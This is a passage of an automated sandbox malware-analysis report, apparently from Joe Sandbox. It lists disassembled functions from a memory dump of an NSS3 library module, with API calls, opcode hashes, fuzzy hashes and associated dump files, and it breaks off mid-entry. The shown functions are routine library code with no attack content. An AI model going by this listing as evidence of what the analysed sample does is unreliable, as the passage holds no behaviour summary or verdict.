                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                • String ID:
                                                                                • API String ID: 1441289343-0
                                                                                • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                • Instruction ID: be63c96f5c53cd712a410e9f013ac982c3083e0e01890b98cb8a15c5197371ef
                                                                                • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                • Instruction Fuzzy Hash: 8921F971D293464BFB10CFA49D4177A37A47FA131CF124269ED085B252F7B1E594C292
                                                                                Function 6CFDACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CERT_NewCertList.NSS3 ref: 6CFDACC2
                                                                                  • Part of subcall function 6CFB2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CFB2F0A
                                                                                  • Part of subcall function 6CFB2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CFB2F1D
                                                                                  • Part of subcall function 6CFB2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CFB0A1B,00000000), ref: 6CFB2AF0
                                                                                  • Part of subcall function 6CFB2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFB2B11
                                                                                • CERT_DestroyCertList.NSS3(00000000), ref: 6CFDAD5E
                                                                                  • Part of subcall function 6CFF57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CFBB41E,00000000,00000000,?,00000000,?,6CFBB41E,00000000,00000000,00000001,?), ref: 6CFF57E0
                                                                                  • Part of subcall function 6CFF57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CFF5843
                                                                                • CERT_DestroyCertList.NSS3(?), ref: 6CFDAD36
                                                                                  • Part of subcall function 6CFB2F50: CERT_DestroyCertificate.NSS3(?), ref: 6CFB2F65
                                                                                  • Part of subcall function 6CFB2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFB2F83
                                                                                • free.MOZGLUE(?), ref: 6CFDAD4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                • String ID:
                                                                                • API String ID: 132756963-0
                                                                                • Opcode ID: 36b0a75613c2e9293cf1e0ca32b2cffade9b7dfe06765049f831ec50fd073722
                                                                                • Instruction ID: c07b7f644646a21dcb7d12b1e1b83bfaeda77e28d1617e472ed5fe427c7bd004
                                                                                • Opcode Fuzzy Hash: 36b0a75613c2e9293cf1e0ca32b2cffade9b7dfe06765049f831ec50fd073722
                                                                                • Instruction Fuzzy Hash: 8621E7B1D002088BEB10DF65D8056EEB7F4EF05208F1A4068D814BB710FB31BA59CBE5
                                                                                Function 6D003C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6D003C9E
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6D003CAE
                                                                                • PR_Unlock.NSS3(?), ref: 6D003CEA
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6D003D02
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                • String ID:
                                                                                • API String ID: 284873373-0
                                                                                • Opcode ID: 5adf4fc25157159af880395d72bee9444e5cfadb65f692d4fa72f219c1579e19
                                                                                • Instruction ID: 8b9a17e2296e0f3ed7a782b958260dffc1993dbeddc5ddfc1ca997bfd7ecc43f
                                                                                • Opcode Fuzzy Hash: 5adf4fc25157159af880395d72bee9444e5cfadb65f692d4fa72f219c1579e19
                                                                                • Instruction Fuzzy Hash: F811AF75900204AFEB019F24EC49FAA37B9EF09368F458065ED088B312E771E950CBE1
                                                                                Function 6D03ED10 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6D03ED34
                                                                                • realloc.MOZGLUE(?,?), ref: 6D03ED5D
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6D03ED74
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • memset.VCRUNTIME140(?,?,?), ref: 6D03ED97
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_ErrorUtilValuemallocmemsetrealloc
                                                                                • String ID:
                                                                                • API String ID: 2992043971-0
                                                                                • Opcode ID: c297db4af9e46c442c25c552dae4b1b1c3bdff2823034ad54fc0ceaa4908f903
                                                                                • Instruction ID: bee58d5abf2b7a06205a369ba35f4c491e232c3b7c82bfa81255736f7c097dc0
                                                                                • Opcode Fuzzy Hash: c297db4af9e46c442c25c552dae4b1b1c3bdff2823034ad54fc0ceaa4908f903
                                                                                • Instruction Fuzzy Hash: D011ACB0E04727ABFB109E65DC84B66B3A8EF00359F124735ED19C3240E731E860CAA2
                                                                                Function 6D03EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6D027FFA,?,6D029767,?,8B7874C0,0000A48E), ref: 6D03EDD4
                                                                                • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6D027FFA,?,6D029767,?,8B7874C0,0000A48E), ref: 6D03EDFD
                                                                                • PORT_Alloc_Util.NSS3(?,00000000,00000000,6D027FFA,?,6D029767,?,8B7874C0,0000A48E), ref: 6D03EE14
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • memcpy.VCRUNTIME140(?,?,6D029767,00000000,00000000,6D027FFA,?,6D029767,?,8B7874C0,0000A48E), ref: 6D03EE33
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                • String ID:
                                                                                • API String ID: 3903481028-0
                                                                                • Opcode ID: c7a330825f22dc350ca172bd9d8ea29778f6263c713780cb75dfcabf96ae603d
                                                                                • Instruction ID: a032ebfa012fc9eed438d56def0388e4ea3703ea600e95426ea0cd183073468c
                                                                                • Opcode Fuzzy Hash: c7a330825f22dc350ca172bd9d8ea29778f6263c713780cb75dfcabf96ae603d
                                                                                • Instruction Fuzzy Hash: 23115EB5A04727ABFB109E65DC84B56B3A8EF04359F124735EE19C7240E731E8648BA2
                                                                                Function 6CFD8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                • String ID:
                                                                                • API String ID: 284873373-0
                                                                                • Opcode ID: e0a8a529972edf32f46b97d365cc423c885b4a9c4cd528c41b93614b947284c1
                                                                                • Instruction ID: 2e29f87b68ee95a142fc2ff5d33ce67b8d84e57941188fdee3b719b66bd1cc2a
                                                                                • Opcode Fuzzy Hash: e0a8a529972edf32f46b97d365cc423c885b4a9c4cd528c41b93614b947284c1
                                                                                • Instruction Fuzzy Hash: E311A071909A019FD700AF78D5886AABBF4FF05754F06496ADC88D7700EB70E8A0CBD2
                                                                                Function 6D05AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6D045F17,?,?,?,?,?,?,?,?,6D04AAD4), ref: 6D05AC94
                                                                                • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6D045F17,?,?,?,?,?,?,?,?,6D04AAD4), ref: 6D05ACA6
                                                                                • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6D04AAD4), ref: 6D05ACC0
                                                                                • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6D04AAD4), ref: 6D05ACDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$DestroyFreeK11_Monitor
                                                                                • String ID:
                                                                                • API String ID: 3989322779-0
                                                                                • Opcode ID: b6d4384d64cc37bb73ab67710ff297be61ae18987124890d882ed5b1fc066dd2
                                                                                • Instruction ID: fb8a45c261e4f2347cad959151f00ae4e174d22eddf6712ef275ea0c771262c4
                                                                                • Opcode Fuzzy Hash: b6d4384d64cc37bb73ab67710ff297be61ae18987124890d882ed5b1fc066dd2
                                                                                • Instruction Fuzzy Hash: 6C0171B5600B029BE750DF39EA08B57BBE8FF00655B104839D85EC3A10EB35F465CBA1
                                                                                Function 6CFC1DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6CFC1DFB
                                                                                  • Part of subcall function 6CFB95B0: TlsGetValue.KERNEL32(00000000,?,6CFD00D2,00000000), ref: 6CFB95D2
                                                                                  • Part of subcall function 6CFB95B0: EnterCriticalSection.KERNEL32(?,?,?,6CFD00D2,00000000), ref: 6CFB95E7
                                                                                  • Part of subcall function 6CFB95B0: PR_Unlock.NSS3(?,?,?,?,6CFD00D2,00000000), ref: 6CFB9605
                                                                                • PR_EnterMonitor.NSS3 ref: 6CFC1E09
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D0790AB
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D0790C9
                                                                                  • Part of subcall function 6D079090: EnterCriticalSection.KERNEL32 ref: 6D0790E5
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D079116
                                                                                  • Part of subcall function 6D079090: LeaveCriticalSection.KERNEL32 ref: 6D07913F
                                                                                  • Part of subcall function 6CFBE190: PR_EnterMonitor.NSS3(?,?,6CFBE175), ref: 6CFBE19C
                                                                                  • Part of subcall function 6CFBE190: PR_EnterMonitor.NSS3(6CFBE175), ref: 6CFBE1AA
                                                                                  • Part of subcall function 6CFBE190: PR_ExitMonitor.NSS3 ref: 6CFBE208
                                                                                  • Part of subcall function 6CFBE190: PL_HashTableRemove.NSS3(?), ref: 6CFBE219
                                                                                  • Part of subcall function 6CFBE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFBE231
                                                                                  • Part of subcall function 6CFBE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFBE249
                                                                                  • Part of subcall function 6CFBE190: PR_ExitMonitor.NSS3 ref: 6CFBE257
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFC1E37
                                                                                • PR_ExitMonitor.NSS3 ref: 6CFC1E4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                • String ID:
                                                                                • API String ID: 499896158-0
                                                                                • Opcode ID: 78204fcc44505a3b4842d591aca61a0c4b2a800c0b3d01722a777ca4008b1954
                                                                                • Instruction ID: 0e62cedd0e29461469f8b3006dd4c3e51b45cc0dc0590922a67d55355bf160f3
                                                                                • Opcode Fuzzy Hash: 78204fcc44505a3b4842d591aca61a0c4b2a800c0b3d01722a777ca4008b1954
                                                                                • Instruction Fuzzy Hash: DC01DF76F0011297EA104A2AEC01F8777B4AB42B48F218031E928DBA91E770F830CBD3
                                                                                Function 6D05AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_FreeSymKey.NSS3(?,6D045D40,00000000,?,?,6D036AC6,6D04639C), ref: 6D05AC2D
                                                                                  • Part of subcall function 6CFFADC0: TlsGetValue.KERNEL32(?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE10
                                                                                  • Part of subcall function 6CFFADC0: EnterCriticalSection.KERNEL32(?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE24
                                                                                  • Part of subcall function 6CFFADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CFDD079,00000000,00000001), ref: 6CFFAE5A
                                                                                  • Part of subcall function 6CFFADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE6F
                                                                                  • Part of subcall function 6CFFADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE7F
                                                                                  • Part of subcall function 6CFFADC0: TlsGetValue.KERNEL32(?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAEB1
                                                                                  • Part of subcall function 6CFFADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAEC9
                                                                                • PK11_FreeSymKey.NSS3(?,6D045D40,00000000,?,?,6D036AC6,6D04639C), ref: 6D05AC44
                                                                                • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6D045D40,00000000,?,?,6D036AC6,6D04639C), ref: 6D05AC59
                                                                                • free.MOZGLUE(8CB6FF01,6D036AC6,6D04639C,?,?,?,?,?,?,?,?,?,6D045D40,00000000,?,6D04AAD4), ref: 6D05AC62
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                • String ID:
                                                                                • API String ID: 1595327144-0
                                                                                • Opcode ID: 4899112226b8a2a105b25949af8eb72d1d344996d72ac3bd765098ffef60fb44
                                                                                • Instruction ID: 767730823a6fd8fd50436f2e3baf31d7bf5fe30c632e3299c66ad24383f527e8
                                                                                • Opcode Fuzzy Hash: 4899112226b8a2a105b25949af8eb72d1d344996d72ac3bd765098ffef60fb44
                                                                                • Instruction Fuzzy Hash: AF0128B5A002019BEB00DF14E9C0F567BE8EB44718F188069ED498F306E731F855CBB1
                                                                                Function 6D00FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CFB9003,?), ref: 6D00FD91
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • PORT_Alloc_Util.NSS3(A4686D01,?), ref: 6D00FDA2
                                                                                • memcpy.VCRUNTIME140(00000000,12D068C3,A4686D01,?,?), ref: 6D00FDC4
                                                                                • free.MOZGLUE(00000000,?,?), ref: 6D00FDD1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 2335489644-0
                                                                                • Opcode ID: c12e4d1f4c3acba0eeac4ea9460bc18708a8cd2373666cbc90cabc3f88546b9a
                                                                                • Instruction ID: eeb6c8b67b215e68d0cef9e1c7d45bf6553a844e615505deb60a005521574a0b
                                                                                • Opcode Fuzzy Hash: c12e4d1f4c3acba0eeac4ea9460bc18708a8cd2373666cbc90cabc3f88546b9a
                                                                                • Instruction Fuzzy Hash: 5BF0FCF5A04203BBFB004F55DC81B277B9DEF44255B048135ED0D8B201E721D810C7E5
                                                                                Function 6D0CCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalDeleteSectionfree
                                                                                • String ID:
                                                                                • API String ID: 2988086103-0
                                                                                • Opcode ID: ba2556b6f87bf9354bbb5622d745bb1bbca4a9aa89e432f18274a64f7a90e8d9
                                                                                • Instruction ID: c7bb720fbdd010c58446d2508bca392a8b98c44d41fdf7bd7649bec0d0ce65a6
                                                                                • Opcode Fuzzy Hash: ba2556b6f87bf9354bbb5622d745bb1bbca4a9aa89e432f18274a64f7a90e8d9
                                                                                • Instruction Fuzzy Hash: 13E030766006089FCA10EFA8DC4488777ACEE492703150529E691C3740D731F915CFA1
                                                                                Function 6CFA9DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_value_text.NSS3 ref: 6CFA9E1F
                                                                                  • Part of subcall function 6CF613C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CF32352,?,00000000,?,?), ref: 6CF61413
                                                                                  • Part of subcall function 6CF613C0: memcpy.VCRUNTIME140(00000000,6CF32352,00000002,?,?,?,?,6CF32352,?,00000000,?,?), ref: 6CF614C0
                                                                                Strings
                                                                                • LIKE or GLOB pattern too complex, xrefs: 6CFAA006
                                                                                • ESCAPE expression must be a single character, xrefs: 6CFA9F78
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: memcpysqlite3_value_textstrlen
                                                                                • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                • API String ID: 2453365862-264706735
                                                                                • Opcode ID: ccb0b74d38e3703f6f9e11c739cf7e27362480cc6fe8064390c36fb7778dcdce
                                                                                • Instruction ID: 4c5a121afe75e2969505329852f5d4793aee0b97b36aa59092b68ef511a42bec
                                                                                • Opcode Fuzzy Hash: ccb0b74d38e3703f6f9e11c739cf7e27362480cc6fe8064390c36fb7778dcdce
                                                                                • Instruction Fuzzy Hash: 4581D975A04255CBD700CF69C0803AAF7F2AF45318F288669D8A58BB85DB37D947C791
                                                                                Function 6D004D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6D004D57
                                                                                • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6D004DE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
